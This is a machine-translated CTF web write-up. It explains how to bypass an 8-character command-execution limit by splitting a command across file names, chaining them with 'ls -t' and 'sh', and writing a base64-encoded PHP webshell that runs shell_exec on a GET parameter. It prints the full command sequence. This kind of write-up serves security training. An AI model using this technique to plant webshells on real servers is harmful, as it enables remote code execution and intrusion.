当前位置：网站首页>CTF_ Web:8-bit controllable character getshell

CTF_ Web:8-bit controllable character getshell

2022-06-25 04:30:00 【AFCC_】

Title source

Practicing recently CTF Medium web I encountered a problem 8 You can execute commands at will within characters , In the end getshell The subject of , I found that many predecessors have written this type of problem solution , But you also need to practice yourself , The title source code is accessed as shown in the figure ：
The title shows the source code
Ideas ： You can see that when the submitted parameters 1 Contains values less than 8 When a , Will be executed as a command , First ?1=ls All file names were found to exceed 8 position , Obviously, this alone 8 Bit execution commands are not sufficient cat Some document , So you need to execute the code with the spliced file name getshell.
ls Look at the catalog file

Use knowledge points to solve problems

>a " stay linux This file will be created directly in , But there's no content "
ls -t " Arrange the files in the directory in chronological order , The last one created comes first "
sh a " Will file a All the contents of the are executed with the command "
who/
am/
i "Linux Command splices in / Will follow the order whoami perform "

for example
whoami Command splicing

In this topic is to write a one sentence Trojan horse to a file , Then visit this sentence to getshell, The command used here to create a sentence is ：

echo <?php echo shell_exec($_GET[1]); >1.php " Easy to view echo "
echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWzFdKTs=|base64 -d>1.php " Use base64 To avoid $ Failed to input special characters "

Input this passage in reverse order and then use it ls -t>0 Execute in the positive order input text , You can generate a one sentence Trojan horse , Note that all characters must be \ escape .

>hp
>1.p\\
>d\>\\
>\ -\\
>64\ \\
>base\\
>\=\|\\
>dKTs\\
>UWzF\\
>fR0V\\
>jKCR\\
>leGV\\
>sbF9\\
>zaGV\\
>obyB\\
>gZWN\\
>waHA\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

Use cat a see ls -t Written content

Use ls see sh a Whether the generation was successfully executed 1.php

And connect to use mv flag.php flag.txt take flag It is amended as follows txt Format .

Final visit flag.txt obtain flag